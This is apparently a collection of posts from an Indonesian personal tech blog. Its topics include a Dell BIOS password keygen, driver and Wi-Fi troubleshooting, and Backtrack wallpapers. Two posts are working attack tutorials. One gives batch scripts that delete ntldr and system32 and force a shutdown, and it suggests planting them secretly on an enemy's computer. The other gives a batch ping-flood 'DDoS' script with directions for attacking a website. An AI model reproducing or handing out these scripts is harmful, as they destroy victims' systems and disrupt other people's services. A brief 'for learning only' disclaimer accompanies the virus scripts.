Saturday, 10 May 2014

Dell 2A7B & 595B serials BIOS Password

Unlock Password BIOS di Dell (Foto ini hanya contoh)

Saya juga baru tau cara ini setelah sebelumnya ketika ingin menginstal ulang laptop Dell punya teman saya, saya dan yang punya tidak tau apa-apa password BIOS dari Dell tersebut. Setelah googling cukup lama, saya mendapatkan caranya. Langsung saja.

  1. Download filenya disini
  2. File yang didownload tersebut berisi 2 file, C file (source code) dan executable (.exe). Jika kamu memakai Windows, langsung Un-rar saja dan double-click file executablenya (yang .exe)
  3. Kamu diminta untuk memasukkan Serial Number komputer kamu. Masukkan System Number yang seperti foto diatas, lengkap 11 digit beserta tanda '-' nya dan HURUF KAPITAL SEMUA
  4. Tekan Enter dan kalian akan mendapatkan passwordnya
NB: Ini baru dicoba untuk yang 4digit diujung System Numbernya 2A7B & 595B.

Regards,
Glunt Daniel.

sumber: http://dogber1.blogspot.com/2010/05/dell-2a7b-keygen.html

Monday, 24 February 2014

Unknown device with location on "Microsoft ACPI-Compliant System"


Question:
I have an unknown device with location on "Microsoft ACPI-Compliant System". Under the Hardware Ids, it's value reads "ACPI\INT33A0". Does anyone know what the device is? Where I can get drivers for it? And what to do?

Answers:
A. The unknown device is part of the Intel Smart Connect Technology. If u dont need it just turn it off in the BIOS/UEFI of the board. (8 People found this helpful)

B. I have the answer!
Search for "Intel Smart Connect" and download the driver (don't use the auto updater, it won't find it). There is a smart connect page telling you about the technology and a link to the download.
After I downloaded and installed this it corrected this problem and the device driver was installed.
I don't know what it does yet, but at least it works now. (1 People found this helpful)

Regards,
Glunt Daniel.

source: http://answers.microsoft.com/en-us/windows/forum/windows_7-hardware/unknown-device-with-location-on-microsoft-acpi/89ddf168-740e-41a6-8e52-c05d6bc21ff1?auth=1

Sunday, 13 October 2013

Android tidak bisa connect ke WiFi Speedy? Ini dia caranya!

"Kok Android saya tidak bisa internetan pake WiFi Speedy ya? Padahal sudah connect"

Diatas adalah pertanyaan saya beberapa minggu yang lalu. 
Setelah search via google,



Ternyata bukan cuma saya yang punya problem WiFi via Android. Terutama WiFi speedy ya. Biasanya modem yang ini sih, modem ZTE, kurang tau juga kalo modem lain. 


Sekarang? Problem solved, dan saya sudah bisa connect ke WiFi speedy, lancar internetan di android pake WiFi speedy dirumah.
Caranya?

Oke langsung aja:

1. Yang harus disiapkan:
- Pastikan kalian sedang ada di waktu luang. Karena nanti kalian harus meng-rooting Perangkat Android kalian.
- Siapkan juga kabel USB Android kalian.
- Ada akses internet di komputer/laptop biar gampang karena nanti saat root kalian membutuhkan file yang harus didownload dan diekstrak dengan WinRAR.

2. Download 'Set DNS' dari Play Store Android kalian.
   
     
     Download dan tunggu sampai terinstal.

 3. Setelah terinstal, open aplikasi Set DNS tadi dan pilih Google DNS.


4. Setelah pilih Google DNS tadi, maka muncul dah yang kek gini, Non-root trial period.


    Pemberitahuan diatas mengingatkan bahwa kita perlu meng-rooting Android kalian.

  Perlu diingat, Cara Root Android tiap tipe Perangkat Android berbeda-beda.

Cek dan pastikan tipe Perangkat Android kalian.
Settings > About device > Lihat 'Model number'nya.
Misalnya, Perangkat Android kalian Samsung Galaxy Fame. Pas dilihat di model numbernya GT-S6810. Berarti Perangkat Android kalian Samsung Galaxy Fame GT-S6810. Okesip.

    Berikut beberapa cara ROOT Android berdasarkan tipenya:

     Untuk tipe Perangkat Android lain bisa kalian search di Google. Pastikan modelnya terlebih dahulu karena perlu diingatkan sekali lagi, bahwa tiap tipe Perangkat Android mempunyai cara & file rooting yang berbeda. Ikuti petunjuk rooting yang jelas, seperti link diatas & harus teliti. Web petunjuk rooting harus meyakinkan. Karena salah dalam rooting bisa berbuah fatal.


5. Setelah Perangkat Android kalian berhasil di rooting, buka kembali Set DNS.
    Pilih Google DNS dan Apply. Lalu tunggu sampai Active DNS kalian berhasil berubah ke 8.8.8.8, 8.8.4.4 
    

6. Setelah berhasil berubah, Reboot Perangkat Android kalian.
7. Coba kembali koneksikan ke WiFi Speedy kalian. 

Jebreet! kalian berhasil mengkoneksikan Perangkat Android kalian ke WiFi Speedy!
Terima kasih telah berkunjung ke blog ini.

Source and Thanks: 
www.google.com
tap

Regards,
Glunt Daniel.

Saturday, 15 September 2012

Trik Menghilangkan http://jardiknas.kemdiknas.go.id/?url=


Pernah gak waktu mau buka webpage, tapi malah ke/

http://jardiknas.kemdiknas.go.id/?url= (404 Page Not Found)? 

Pasti pernah apalagi sering bagi yang menggunakan modem ZTE WiFi Speedy. Memang sering ditemui jika pakai Mozilla Firefox, tetapi ini bukan soal browser yang anda pakai. Toh browser super cepat Google Chrome juga kadang sekali-sekali kena. Ini dikarenakan ISP Speedy nya. 

Karena yang paling sering kena browser Mozilla Firefox, berikut trik menghilangkannya:

clear your recent history pada menu Privacy di Setting

Setting > Privacy > clear your recent history
Nah disana ada pilihan-pilihan, centang semuanya.
Sekarang klik Clear Now.

It's all done!

Sebenarnya sedikit percuma pakai cara ini karena suatu saat muncul begitu lagi. Tapi lumayan daripada gak bisa buka sama sekali. Saya juga sampai saat ini masih mencari cara untuk menghapusnya permanen.

Regards,
Glunt Daniel.

Thursday, 13 September 2012

Wallpaper Background Backtrack 5

Backtrack atau Back|Track adalah salah satu distro Linux, seperti Linux Ubuntu, Linux Mint, dll. Tapi dirancang untuk kalangan menengah keatas, karena sistemnya yang dimodifikasi untuk para maniak hacking, cracking, backdoor, pentest, penetration, dll. Berikut ini adalah background Backtrack 5. Keren, lumayan untuk dijadikan wallpaper bro











Tutorial membuat virus yang mudah

ntldr is missing! why?

Membuat virus emang gak ada yang gampang, selain harus pinter coding dan mahir, juga harus berhati-hati. Nah saya hanya mencontohkan 'virus' manual mudah, biasanya disebut ntldr. Sistemnya menghanguskan system32 ente dan gak bisa booting saat restart atau ngidupin kompi. Triknya itu terserah ide kalian masing-masing, mau masukin diem-diem ke kompi musuh atau gimana kek. Langsung aja bro:

Jadi disini saya buat 3 level. Terserah deh dipilih. Trus copy aja yang diantara ---batas---, paste kan di notepad. Save as batch file (.bat) seperti membuat DDOS.bat di post sebelumnya. Ketika udah di save dan jadi, delete!
Selamat! kompi anda harus diinstal ulang! =))

level 1
----------batas-------------
@echo off
del c:\ntldr | y
del c:\windows\system32\ | y
----------batas-------------


level 2
----------batas-------------
attrib -s -h -r c:\ntldr
ren c:\ntldr anguskompilu
del c:\anguskompilu
----------batas-------------


level 3
----------batas-------------
echo off
title auahgelap
color 0a
cls
attrib -s -h -r c:\ntldr
ren c:\ntldr anguskompilu
del c:\anguskompilu
shutdown -s -t 666 -c "Goto Hell" -f
attrib +h +r +s *.* /s /d
exit
----------batas-------------

Saya tidak bertanggung jawab atas pemakaian, ini hanya bertujuan pembelajaran.
Use with your own risk!

Wednesday, 12 September 2012

DDoS Menggunakan Notepad

Kembali lagi ke topik DDoS atau Distributed Denial of Service. Kali ini tentang cara membuat nya. Mudah, DDoS menggunakan notepad ya berarti hanya membutuhkan notepad, web target, dan koneksi internet. Hasilnya? Apakah berhasil?

Webpage sempat offline karena serangan DDoS bermodal notepad

Webpage error beberapa menit kemudian


Jadi jangan pernah sekalipun meremehkan "yang kecil" bro.
Langsung aja, step by stepnya mudah.
Buka Notepad.
Kalau gak mau ribet, copy kode dibawah ini dari @echo sampai DDOS dan paste kan di notepad:

@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS With Batchfile
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS


Sekarang klik File > Save As > Save As Type nya pilih All Files > File name nya ketik DDOS.bat > Save.
(Ingat! file name harus disertai .bat)
Cara Penggunaan
1. Klik 2x file DDOS tersebut.
2. Masukkan web target, Enter. (Web yang valid akan muncul IP Address)

 masukkan web target

3. Masukkan IP Target yang muncul, Enter.

 Keluar IP Address target dan masukkan IP tersebut



4. Masukkan jumlah paket, Enter. (Saya biasanya 5000 kalo sambil browsing. Atau 10000 juga boleh)

Masukkan jumlah paket yang akan dikirim

5. Attacking server is started!

Attacking Server!

Regards,
Glunt Daniel

Thanks to cyber4rt